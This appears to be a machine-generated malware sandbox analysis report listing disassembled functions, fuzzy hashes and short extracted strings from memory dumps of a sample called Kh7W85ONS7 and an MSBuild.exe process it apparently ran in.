Opcode Fuzzy Hash: c7fbb864be73c6ff57a48850ca348ae11041907b610b76bbe807a96b334d18e1
Instruction Fuzzy Hash: ABC128B8C80F058BE720CF25E8C85893BF1BFA5394F904B19D1616B2D1DBB415AACF44

Function 075D5898 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54261af52af8d801012909a0bffc5a375058f1de4298828f93ca1d03936930ec
Instruction ID: c114d784a70fc660f09ab4f7258570f7bbc6ead43a85409d3525a0241eba8781
Opcode Fuzzy Hash: 54261af52af8d801012909a0bffc5a375058f1de4298828f93ca1d03936930ec
Instruction Fuzzy Hash: 07A17C70A1020A9FCB04DFACDA41ADDBBF1FF89318F14C969D404AB355DB38AA098F51

Function 075D0268 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6f01ecd9435dff2b0cae4179975e45084547fdbee27fc377ab42575530bc55e
Instruction ID: 4f1f13c3b7d7bea0462ffd528da935038ed16966767114797f2a1277e06ff368
Opcode Fuzzy Hash: d6f01ecd9435dff2b0cae4179975e45084547fdbee27fc377ab42575530bc55e
Instruction Fuzzy Hash: B071F7B4E15209CFCB14CFA9C9805DEFBF2BF89210F24946AD419B7354E3359E428B65

Function 075D0278 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ce4f0e5960ccc26582d781b3ddd3f99c6e1fcba1fb61e356a8aaf3419310632
Instruction ID: 6fb9014b4ad0d15108a487822860b62c79aa515b8d91c002d59a27e3155854ee
Opcode Fuzzy Hash: 3ce4f0e5960ccc26582d781b3ddd3f99c6e1fcba1fb61e356a8aaf3419310632
Instruction Fuzzy Hash: 1571D2B4E15209DFCB14CFA9C5809DEFBF2BF89210F24986AD419B7354E3349E428B64

Function 0752FC21 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130367257.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdc9f22501dbd14c7a9ecb7a04f33803f78bc94c52e5ebfcc831ab8530dcdebe
Instruction ID: 204e53b77b0c6db1576c1f96cff7238deee7ccad25346d91e05c2a3576ae4e29
Opcode Fuzzy Hash: cdc9f22501dbd14c7a9ecb7a04f33803f78bc94c52e5ebfcc831ab8530dcdebe
Instruction Fuzzy Hash: 5C6147B1E18219DFCB04CFA9D4815EEFBB5BF8A300F14886AD455BB294D3349A42CF94

Function 0752F930 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130367257.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebb439ffec6f281d50107fef9cfbd7b55bd4a141ea998b32c5ddfcf6cdcdadfa
Instruction ID: e24afd51e2b2124b5e08c6ba9da76cb76438fc0a271b959c8f5b8516a5a191f7
Opcode Fuzzy Hash: ebb439ffec6f281d50107fef9cfbd7b55bd4a141ea998b32c5ddfcf6cdcdadfa
Instruction Fuzzy Hash: 1671F2B4E1421ADFCB04CF99E5809EEFBB2FF8A310F14945AD415A7294C3349982DF95

Function 0752F920 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130367257.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7fe878b67d4d35012ddc7a1f1b2bdd6c92b4adb18cdf505a894203bf9659b76
Instruction ID: 2baa2b0ea248fc2bfad4aa530a2d996cf16b381502a632fa8c4e517a9f87de0b
Opcode Fuzzy Hash: d7fe878b67d4d35012ddc7a1f1b2bdd6c92b4adb18cdf505a894203bf9659b76
Instruction Fuzzy Hash: 2C6117B0E1421ADFCB04CF99D5809EEFBB2FF8A310F249456D415A7294D7349982DF94

Function 075D0006 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3c603287129de54bb3c3e5064da77891b9e087ef28a45e2cc7d18b448a0071c
Instruction ID: bf1056acad08fba1c740b4984bd035ca3ebe536dec8642e358a9da19f9447a53
Opcode Fuzzy Hash: e3c603287129de54bb3c3e5064da77891b9e087ef28a45e2cc7d18b448a0071c
Instruction Fuzzy Hash: A9514AB1D0520A9FCB44CFAAC8405EEFBF2BF8A310F14C4AAC415EB291D2349A45CF95

Function 075D0040 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 584dec462960d84585cb4238f4cf771e9dbb486b803b9579607d4a9c6e1734a6
Instruction ID: edb5bb58b3ef1276c8384ab1421cf090c8b79b063e2a8bec0393ecf5bd948fbb
Opcode Fuzzy Hash: 584dec462960d84585cb4238f4cf771e9dbb486b803b9579607d4a9c6e1734a6
Instruction Fuzzy Hash: BE4118B0E1020ADFCB58DFAAC5805EEFBF2FB89300F54D46AC419A7254E3349A418F95

Function 075D06A8 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a2490e848fc88b2400324bc1f0b66d6c81076290f06668fc194d029ad182a47
Instruction ID: 035d9c1e0f56966294e5779a021dcb7eb51053c405e99162d96a20182b9a0209
Opcode Fuzzy Hash: 5a2490e848fc88b2400324bc1f0b66d6c81076290f06668fc194d029ad182a47
Instruction Fuzzy Hash: CE41B8B1E016189FEB58CFAAD9407DEFBB3BF89300F14C0AAD509AB254D7305A468F55

Function 075D0699 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3763080b9c110cbbbaca9954f9be0067a2bbe2cc439285a915cffeb0ad4dc46a
Instruction ID: 3e1ea32fc78fe1011901361bdd2179b8af684874336e0acf6359df479d669e6c
Opcode Fuzzy Hash: 3763080b9c110cbbbaca9954f9be0067a2bbe2cc439285a915cffeb0ad4dc46a
Instruction Fuzzy Hash: 2741FAB1E016198FEB58CF6AC94079EFBF3BF89300F14C0AAD448AB255DB305A468F55

Function 075D11F0 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6df6a104d6792d8d7c8ad58326efd43b65612a7f26395acffb0dfc2cf7003ad
Instruction ID: 4b44cda0ee8b5dba30d78a47ded50a8bfb6c89d69d7b3033dfae504dcc1c86de
Opcode Fuzzy Hash: d6df6a104d6792d8d7c8ad58326efd43b65612a7f26395acffb0dfc2cf7003ad
Instruction Fuzzy Hash: 1F412CB1E056188BEB68DF6B994479EFBF3BFC9300F14C1BA854DA6254EB3409858F11

Function 075D11E9 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6979e88b069ceeac8ed6dafc4bc2f319ce870ce94dd481a85447de11b2bb7f23
Instruction ID: b615a63b38266fb2deee0b688bee2e72a32a4383b63da74150b78d331fbd63e2
Opcode Fuzzy Hash: 6979e88b069ceeac8ed6dafc4bc2f319ce870ce94dd481a85447de11b2bb7f23
Instruction Fuzzy Hash: F8413AB1E016188BEB5CDF6B8D4468AFBF3BFC9200F14C1BA854DA6264EB3409858F11

Function 075EB8C7 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130509221.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75e0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2d3b4f91fb118ab78220a534db6c98006f4c51899a519bd916dba338a08a92b
Instruction ID: fd9b1dc889513abff7d3aa1947ce134faf1b63f43ad13a7ba0fcd4ac5a9621a5
Opcode Fuzzy Hash: c2d3b4f91fb118ab78220a534db6c98006f4c51899a519bd916dba338a08a92b
Instruction Fuzzy Hash: 7021B9B1E006189FEB18CFABD94079EFBF7ABC8200F14C0AAD518A6254EB3409458F61

Function 075D43C0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df324643a22cf80a3eb170c83c731091a76fa2eb31399cade2c059462205d0ca
Instruction ID: a948d72985fcd905e5774921397ceef0a28a5ed4fe4e8fae475dfa64036a4f52
Opcode Fuzzy Hash: df324643a22cf80a3eb170c83c731091a76fa2eb31399cade2c059462205d0ca
Instruction Fuzzy Hash: B92127B1E116198BDB18CFABD8406EEFBF7BFC9210F14C12AD918A7254DB344A468F51

Function 075D3D30 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb475314cbc069b3cf7a80e4aac13b0fdf8597b8b9983bab3d21079798b1f04e
Instruction ID: bf9725377b21be399890a89338ad53ad2ec43d371342ed3c814bfa166f18399d
Opcode Fuzzy Hash: fb475314cbc069b3cf7a80e4aac13b0fdf8597b8b9983bab3d21079798b1f04e
Instruction Fuzzy Hash: 331147B1E11619CBDB58CFAAE8406EEFBF7BBC9210F14C03AD408A7214DB305A058F51

Function 075D9388 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1439c82a168bf9a0b59ee8a32ef32db4b62f5b56af0a22f23a3f30135821f377
Instruction ID: d549d09b7e19b5cde4c70d51b3f1a34b419baf67f93cb19ab804e8b2d23caf6c
Opcode Fuzzy Hash: 1439c82a168bf9a0b59ee8a32ef32db4b62f5b56af0a22f23a3f30135821f377
Instruction Fuzzy Hash: 421114B1E116198BDB18CFAAD9416DEFBFBFBC9210F14C07AD518A7214DB305A068F61

Function 075D4A28 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62a6040b50c51d686ecc56619ff4e8283cd3dae254c15b05371c0b306ac2b5b6
Instruction ID: cea24c18fb248e856ad82e09b2306f483d173ff6ce69ce4b2eb16364678337c9
Opcode Fuzzy Hash: 62a6040b50c51d686ecc56619ff4e8283cd3dae254c15b05371c0b306ac2b5b6
Instruction Fuzzy Hash: C71142B1E116198BDB58CFAAD9406EEFBF7EBC8200F14C07AD908A7214DB305A068F51

Function 075D7A98 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07175682e47eaff5c49142d594f305348f461cbfa865f59c76189c5cab3bc0a7
Instruction ID: b5a2fa8402b458e5942f7c1975263057ca8092b43e54735089b49e5954ca63aa
Opcode Fuzzy Hash: 07175682e47eaff5c49142d594f305348f461cbfa865f59c76189c5cab3bc0a7
Instruction Fuzzy Hash: AF1147B1E116188BDB18CFAAD8406EEFBF7BBC8200F14C03AD508A7214DB305A468F90

Function 075D7A89 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7867ca7a5869f32fbb7b1f5f2d5f92b358230fd26778bd55ea06befa1a9c13fc
Instruction ID: 95c6d767ae1133a672dd43b97076e6330722eb291ae44a9c0df1e57230596c22
Opcode Fuzzy Hash: 7867ca7a5869f32fbb7b1f5f2d5f92b358230fd26778bd55ea06befa1a9c13fc
Instruction Fuzzy Hash: 49215C70E156599BEB18CF6AC84069EFBF3AFC9200F18C07AD448A7254DA344A458F51

Analysis Process: MSBuild.exePID: 8040, Parent PID: 7368COMMON

Execution Graph

Execution Coverage:	15.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.4%
Total number of Nodes:	123
Total number of Limit Nodes:	0

Executed Functions

Function 02D75AC0 Relevance: 1.5, Strings: 1, Instructions: 281
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Vbl, xrefs: 02D75D77

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID: \Vbl
API String ID: 0-3680573778
Opcode ID: 58dd6f1473aa9e10c018710e525b92fa38a84ef251c8570317c5512da793576a
Instruction ID: 306dfc111bb0469a83eefe637e1fd28ec58b342d553315d03555cd8e611b9be9
Opcode Fuzzy Hash: 58dd6f1473aa9e10c018710e525b92fa38a84ef251c8570317c5512da793576a
Instruction Fuzzy Hash: 75B15C70E00209CFDB10CFA9D8857AEBBF2AF88304F548529D815A7394EB799C45CF86

Function 02D76390 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b7b58bd94fe75f18635117aa9a3a9a735c3945b08f726a7af84884aa4df6f28
Instruction ID: 00e3f6c13f3d05a2c114509b6589700d3face8602250389c4bd95ef784cabec9
Opcode Fuzzy Hash: 6b7b58bd94fe75f18635117aa9a3a9a735c3945b08f726a7af84884aa4df6f28
Instruction Fuzzy Hash: BCB15B70E04609CFDB10CFA9D88579EBBF6AB88718F148129D815A7398FB79DC45CB81

Function 02D760FC Relevance: 2.7, Strings: 2, Instructions: 181
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Vbl, xrefs: 02D76177
\Vbl, xrefs: 02D762CA

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID: \Vbl$\Vbl
API String ID: 0-1281196522
Opcode ID: 11571257148993a5f80a4dcfec13f9ad3363ed810e9fdce0082a750a4319b3e2
Instruction ID: 5afa8a32b3b1cba0952a88cf9859c57eb94bebebbebd97556caae809f2fd3ca0
Opcode Fuzzy Hash: 11571257148993a5f80a4dcfec13f9ad3363ed810e9fdce0082a750a4319b3e2
Instruction Fuzzy Hash: EB7148B0E00609CFDB10CFA9C84579EBBFAAF88714F188129E855A7354FB78D845CB95

Function 02D76108 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Vbl, xrefs: 02D76177
\Vbl, xrefs: 02D762CA

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID: \Vbl$\Vbl
API String ID: 0-1281196522
Opcode ID: 116ad21168e0eb874cc0385116200a7d20cc2403b49852d00df73ed80b8589b9
Instruction ID: efa20500295ed487e18c0b235aa830585b9b52ecd98c1b45d76950c9b31d90dd
Opcode Fuzzy Hash: 116ad21168e0eb874cc0385116200a7d20cc2403b49852d00df73ed80b8589b9
Instruction Fuzzy Hash: E67148B0E00609CFDB14CFA9C88579EBBF6AF88714F188129E415A7354FB78D845CB95

Function 02D76100 Relevance: 2.7, Strings: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Vbl, xrefs: 02D76177
\Vbl, xrefs: 02D762CA

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID: \Vbl$\Vbl
API String ID: 0-1281196522
Opcode ID: ab8f83a651b2399924d54b630b3612b6bc2b306a221867316d67c2d5d8edc5c8
Instruction ID: daa457367f2e77ec8a6b9b4cf96bbd111c96452f22895c964d656ecb44c8e3eb
Opcode Fuzzy Hash: ab8f83a651b2399924d54b630b3612b6bc2b306a221867316d67c2d5d8edc5c8
Instruction Fuzzy Hash: B17156B0E00609CFDB14CFA9C88579EBBF6AF88714F188129E415AB354FB789845CB95

Function 02D7CB98 Relevance: 1.8, Strings: 1, Instructions: 531
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 02D7CD78

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: f3e4db34ef90fff8a1112d731a55222e165e77757f65608f93e490cd0455d057
Instruction ID: 2d8de3da64f3de0f26d8219ff317acc5a2e3fa32f07a52dc8d328079801114d2
Opcode Fuzzy Hash: f3e4db34ef90fff8a1112d731a55222e165e77757f65608f93e490cd0455d057
Instruction Fuzzy Hash: 52321470A006099FDB24CF69C884B9DBBF2FF88304F24C619E4159B759E734E896CB84

Function 02D75AB4 Relevance: 1.5, Strings: 1, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Vbl, xrefs: 02D75D77

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID: \Vbl
API String ID: 0-3680573778
Opcode ID: 55dad561134d97cd00f61dc71672deebc780446dd6957dac4e277328d5a56ac4
Instruction ID: c2f299102a8e149caf2a8a219d7da7e0c6e1d63ff5f76a698cc52f7c60ceb55a
Opcode Fuzzy Hash: 55dad561134d97cd00f61dc71672deebc780446dd6957dac4e277328d5a56ac4
Instruction Fuzzy Hash: 6BB15CB0E00209CFDB10CFA9D8857AEBBF2AF48704F548129D815A7354EB799C45CF96

Function 02D75ABC Relevance: 1.5, Strings: 1, Instructions: 275
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Vbl, xrefs: 02D75D77

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID: \Vbl
API String ID: 0-3680573778
Opcode ID: c3124abd7b72bb31fd0dc50847d04633d8916fdf0e58209c4abb1275fbd6d355
Instruction ID: d8b8d56ef73054c467d39bc70a2b30b964529e8e32300a1bb8cd23a4626fc828
Opcode Fuzzy Hash: c3124abd7b72bb31fd0dc50847d04633d8916fdf0e58209c4abb1275fbd6d355
Instruction Fuzzy Hash: E8B14CB0E00209CFDB10CFA9D8857AEBBF2AF88714F548129D815A7354EB799C45CF96

Function 02D71750 Relevance: 1.4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d.t, xrefs: 02D7179D

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID: d.t
API String ID: 0-955178627
Opcode ID: a4872ffc97ed75c82feb17d51d5a1dd9b2f93d9932ba0d622b1868e54ce94942
Instruction ID: 68997e4ebc5cf594e3797fd55c0dd35811fc4693ea09dcb02bcfc9803a54577f
Opcode Fuzzy Hash: a4872ffc97ed75c82feb17d51d5a1dd9b2f93d9932ba0d622b1868e54ce94942
Instruction Fuzzy Hash: B2517C30B141149FD748DF69C498A5EBBF6EF89B00F6181A9E406EB3A1DB75DC06CB90

Function 02D78651 Relevance: 1.4, Strings: 1, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

K, xrefs: 02D787A7

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-2299363055
Opcode ID: 94b9e5bc9d19512c8a2b6c0f3f5c705cd27afc7646bff2ab863bd214433f6d1a
Instruction ID: 738501d355021f1d2c313273c81b5a7cd620085e6e9cde5a905050c1fdcd3255
Opcode Fuzzy Hash: 94b9e5bc9d19512c8a2b6c0f3f5c705cd27afc7646bff2ab863bd214433f6d1a
Instruction Fuzzy Hash: 18418D30A00649DBDB18DFB9C5846AEB7F2BF88304F208529D416EB350EB75EC46DB80

Function 02D7865C Relevance: 1.4, Strings: 1, Instructions: 126COMMON

Download Yara Rule

Strings

K, xrefs: 02D787A7

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-2299363055
Opcode ID: 836d1637912391b68297c239d9417fa16911a70e3b7cb603f15627cee69921d7
Instruction ID: 2dff7882bd82838f1eace270b11e78093262e8920e1b8d69d8d4182bba9af3ce
Opcode Fuzzy Hash: 836d1637912391b68297c239d9417fa16911a70e3b7cb603f15627cee69921d7
Instruction Fuzzy Hash: 02417D30A0064A9BDB18DF79C59469EBBB2BF89304F208529D416EB350EB75EC46DB80

Function 02D71759 Relevance: 1.4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

Strings

d.t, xrefs: 02D7179D

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID: d.t
API String ID: 0-955178627
Opcode ID: abdccd71c9f985e07512670ab250da07b741702604b1d9e69f44c7335af4f861
Instruction ID: 6a5b2330387b1006714a7d4dfbeaf4649f5379d58c9eccb4608f83eeeab8209f
Opcode Fuzzy Hash: abdccd71c9f985e07512670ab250da07b741702604b1d9e69f44c7335af4f861
Instruction Fuzzy Hash: E7414C34B101109FC7589F69D458A6EBBF6FF88710F258169E806EB3A5CB71DC05CB90

Function 02D7CA09 Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

&?A, xrefs: 02D7CA36

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID: &?A
API String ID: 0-2592389242
Opcode ID: d6b937934effda2e79f9a5bf82e194779d40f74f422ae4645f60c614a46ac90a
Instruction ID: 80c9874d1683d7595fb5618c0977b185e956db711725b41e5ce8f8a523f191bf
Opcode Fuzzy Hash: d6b937934effda2e79f9a5bf82e194779d40f74f422ae4645f60c614a46ac90a
Instruction Fuzzy Hash: 3E11A171A043008FDB08DF54D8857EA7FA1FFC8711F1484A9E5489F296EB758815CB60

Function 02D7CA14 Relevance: 1.3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

Strings

&?A, xrefs: 02D7CA36

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID: &?A
API String ID: 0-2592389242
Opcode ID: d195837229fc6cb0f63d23e5f850f65ef76aa0fd1efdfcf709c25dc7113f1afa
Instruction ID: 70c2e19b614ed0c2bd1fa54234c807ddeab4d3d33698f9ce02d27c6b4ebe08fb
Opcode Fuzzy Hash: d195837229fc6cb0f63d23e5f850f65ef76aa0fd1efdfcf709c25dc7113f1afa
Instruction Fuzzy Hash: D3018071A003008BDB08DF54D88579A7BA1FFC8711F108579E5089F285DB7188158BA0

Function 02D7CA18 Relevance: 1.3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

Strings

&?A, xrefs: 02D7CA36

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID: &?A
API String ID: 0-2592389242
Opcode ID: 002310895c91301b329efb85f1715cb8f31256b27e2c78533d15cbf362ab5430
Instruction ID: 481ec577e87eee79321bc5004d2680d06bc09da1c5b7fafaabe668f3e56a9875
Opcode Fuzzy Hash: 002310895c91301b329efb85f1715cb8f31256b27e2c78533d15cbf362ab5430
Instruction Fuzzy Hash: 71018C70A003049BEB08DF55D88579ABBA6FBC8710F108579E9089F285DBB19815CBA0

Function 02D71F3F Relevance: .8, Instructions: 788COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
